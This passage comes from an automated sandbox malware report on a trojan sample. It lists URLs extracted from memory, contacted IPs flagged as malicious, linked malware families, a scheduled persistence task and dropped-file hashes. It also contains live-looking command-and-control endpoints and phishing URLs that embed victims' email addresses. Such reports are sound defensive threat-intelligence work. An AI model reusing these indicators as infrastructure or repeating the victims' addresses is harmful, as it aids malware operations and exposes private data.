https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection	9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.dr	false	URL Reputation: safe	unknown
https://word.office.com	explorer.exe, 0000000C.00000003.3154032054.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3138931305.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3141625992.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137764604.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3145313076.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.202.233.158/e96ea2db21fa9a1b.phpws	svchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.x-ways.net/winhex/subscribe	9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.x-ways.net/forensics/x-tensions.htmlf	9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com-	explorer.exe, 00000002.00000000.2166104527.000000000C048000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.158/ws	svchost015.exe, 00000007.00000002.2809296945.00000000009FC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.202.233.158Gk	svchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 0000000C.00000003.3154032054.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3138931305.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3141625992.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137764604.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3145313076.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.dr	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0	9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.dr	false	URL Reputation: safe	unknown
https://powerpoint.office.comEMd	explorer.exe, 00000002.00000000.2166104527.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.158j	svchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.dr	false	URL Reputation: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000002.00000000.2166104527.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://outlook.come	explorer.exe, 00000002.00000000.2166104527.000000000C048000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000002.00000000.2163555147.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/	explorer.exe, 00000002.00000000.2163021353.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3138931305.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3361492931.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3145313076.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3154032054.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.158/e96ea2db21fa9a1b.php5d1ef941bc7800	svchost015.exe, 00000007.00000002.2809296945.00000000009FC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.x-ways.net/winhex/license	9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.202.233.158	unknown	Russian Federation	9009	M247GB	true
84.32.84.152	free.cdn.hstgr.net	Lithuania	33922	NTT-LT-ASLT	true
2.185.214.11	epohe.ru	Iran (ISLAMIC Republic Of)	58224	TCIIR	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1502739
Start date and time:	2024-09-02 08:19:23 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	oZB7n3wuNk.exe renamed because original name is a hash value
Original Sample Name:	a4bc249dc997df25a0e709eee0a0df87.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/11@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 40 Number of non-executed functions: 8
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, UserOOBEBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, svchost.exe, StartMenuExperienceHost.exe, TextInputHost.exe, mobsync.exe
Excluded IPs from analysis (whitelisted): 204.79.197.203, 2.23.209.150, 2.23.209.158, 2.23.209.153, 2.23.209.166, 2.23.209.156, 2.23.209.160, 2.23.209.162, 2.23.209.161, 2.23.209.154, 2.23.209.179, 2.23.209.183, 2.23.209.191, 2.23.209.186, 2.23.209.187, 2.23.209.182, 2.23.209.188, 2.23.209.185, 2.23.209.189
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, r.bing.com.edgekey.net, a-0003.a-msedge.net, ctldl.windowsupdate.com, p-static.bing.trafficmanager.net, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, r.bing.com, api-msn-com.a-0003.a-msedge.net
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:20:30	API Interceptor	100023x Sleep call for process: explorer.exe modified
08:20:36	Task Scheduler	Run new task: Firefox Default Browser Agent 3689BA73780E4DA0 path: C:\Users\user\AppData\Roaming\birajci

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.202.233.158	mLn7GEEpuS.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	V6n3oygctH.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	91.202.233.158/e96ea2db21fa9a1b.php
2.185.214.11	jvR4ju7uPW.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	mzxn.ru/tmp/index.php
2.185.214.11	z0PrDUH3Ab.exe	Get hash	malicious	SmokeLoader	Browse	movlat.com/tmp/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
epohe.ru	mLn7GEEpuS.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	175.119.10.231
	V6n3oygctH.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	211.181.24.132
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	105.155.13.153
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	185.12.79.25
free.cdn.hstgr.net	mLn7GEEpuS.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	185.77.97.68
	V6n3oygctH.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	84.32.84.249
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	84.32.84.88
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	84.32.84.144
	https://olive-hummingbird-763499.hostingersite.com/Onedrive-inboxmessage/onenote.html#asa@aan.pt	Get hash	malicious	Unknown	Browse	154.62.105.236
	https://olive-hummingbird-763499.hostingersite.com/Onedrive-inboxmessage/onenote.html%23e.szejgis@arlen.com.pl&c=E%2C10%2CGElLHQ3V9C4dUNBFMZt1mVRH2LpMhvMQrmpyxCta58errD7FQTDbxAt4Y5cCMR6WJVxZVMHk4h8%2BUN47&typo=1&know=0	Get hash	malicious	Unknown	Browse	84.32.84.212

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NTT-LT-ASLT	V6n3oygctH.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	84.32.84.249
	http://cloud-log.blogspot.co.ke/	Get hash	malicious	Unknown	Browse	84.32.84.33
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	84.32.84.88
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	84.32.84.144
	PI 30_08_2024.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	play.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	ORDER_pdf.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	LPO 92558 & 92669.exe	Get hash	malicious	FormBook	Browse	84.32.84.88
	GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	Curriculum Vitae.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
M247GB	mLn7GEEpuS.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	91.202.233.158
	V6n3oygctH.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	91.202.233.158
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	91.202.233.158
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	91.202.233.158
	firmware.arm-linux-gnueabihf.elf	Get hash	malicious	Unknown	Browse	172.111.253.69
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	158.46.140.117
	OFFER-INQUIRY.jar	Get hash	malicious	STRRAT	Browse	37.120.199.54
	http://stream.crichd.vip/update/sscricket.php	Get hash	malicious	Unknown	Browse	38.132.109.126
	1724161253.9014926.dll	Get hash	malicious	Unknown	Browse	172.86.67.94
	1724161253.9014926.dll	Get hash	malicious	Unknown	Browse	172.86.67.94
TCIIR	mirai.mpsl.elf	Get hash	malicious	Mirai	Browse	217.219.172.133
	mirai.ppc.elf	Get hash	malicious	Mirai	Browse	193.239.197.42
	SecuriteInfo.com.Linux.Siggen.9999.6015.2041.elf	Get hash	malicious	Mirai	Browse	217.219.38.90
	jew.x86.elf	Get hash	malicious	Unknown	Browse	37.255.252.250
	xd.x86.elf	Get hash	malicious	Mirai	Browse	85.185.108.192
	KKveTTgaAAsecNNaaaa.spc.elf	Get hash	malicious	Unknown	Browse	164.215.186.35
	BafkIYUCdg.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	217.219.131.81
	yKNb9xVRKP.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	217.219.131.81
	oc_x86_64.elf	Get hash	malicious	Mirai	Browse	2.179.223.33
	Compensation_July_2024_Fr._Meyer_s_Sohn_774d69d42b7d81c4bef3847f4a902904burcu.ucarburcu.ucar.pdf	Get hash	malicious	Phisher	Browse	217.219.67.160

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	5QfB8N2Jte.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	84.32.84.152
	x6N3TgPQvm.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	84.32.84.152
	mth9UWp36C.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	84.32.84.152
	mLisubeK3B.exe	Get hash	malicious	LummaC	Browse	84.32.84.152
	4BPdl1loHY.exe	Get hash	malicious	LummaC	Browse	84.32.84.152
	7IMcMa3pcr.exe	Get hash	malicious	LummaC	Browse	84.32.84.152
	j16WMVKwYE.exe	Get hash	malicious	LummaC	Browse	84.32.84.152
	quotation.js	Get hash	malicious	Unknown	Browse	84.32.84.152
	81bl0ZlcJ3.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	84.32.84.152
	ejH1Ma9DnJ.exe	Get hash	malicious	LummaC, Vidar	Browse	84.32.84.152

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\svchost015.exe	mLn7GEEpuS.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse
	V6n3oygctH.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse
	ACGPhnMVxb.exe	Get hash	malicious	CryptOne, RHADAMANTHYS	Browse
	2eqt27LXwV.exe	Get hash	malicious	CryptOne, RHADAMANTHYS	Browse
	uxx8jvvSHl.exe	Get hash	malicious	LummaC, CryptOne	Browse
	1wM0OWBdv5.exe	Get hash	malicious	LummaC, CryptOne	Browse
	1wM0OWBdv5.exe	Get hash	malicious	LummaC, CryptOne	Browse
	JZ9FCJzkXL.exe	Get hash	malicious	LummaC, CryptOne	Browse
C:\Users\user\AppData\Local\Temp\9A25.exe	mLn7GEEpuS.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse
	V6n3oygctH.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_fe8167436d6db6c6d2c4bed5d6f2d2c06e142845_f78a65ed_2f8ce52e-7594-4f7d-b0c6-0e1b9b636e3e\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.255204353797818
Encrypted:	false
SSDEEP:	384:aKEC1LrEaJajAWyY9olRb5cWzuiFIY4lO8k:an8rEaJaj6YyjbeWzuiFIY4lO8
MD5:	546292DBEA11F235CE66119629C4673A
SHA1:	7A4BADFE7912244EE658DAA392C6D2B6ED7DD5B6
SHA-256:	D317AE30C64EEA6CAEA0E93B91FA474E8C2A5079F8A07091A271ECA4B77F4DC7
SHA-512:	8223AF77CBFA902D3D4D440EB596396D57CC716645371D88E091EC139746AC112EC29D9380CC2B577FC75BA59CF521C68A25A0D97806D55F6C486431F98AFD5D
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.7.3.1.7.0.8.7.9.2.1.6.7.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.8.c.e.5.2.e.-.7.5.9.4.-.4.f.7.d.-.b.0.c.6.-.0.e.1.b.9.b.6.3.6.e.3.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.4.b.f.f.0.0.2.-.0.1.6.2.-.4.0.2.e.-.8.0.7.c.-.1.2.0.6.6.7.4.8.1.b.a.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.x.p.l.o.r.e.r...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.a.4.-.0.0.0.1.-.0.0.1.5.-.5.c.9.0.-.d.1.f.b.f.2.f.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.2././.1.2././.2.1.:.2.0.:.5.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE42E.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
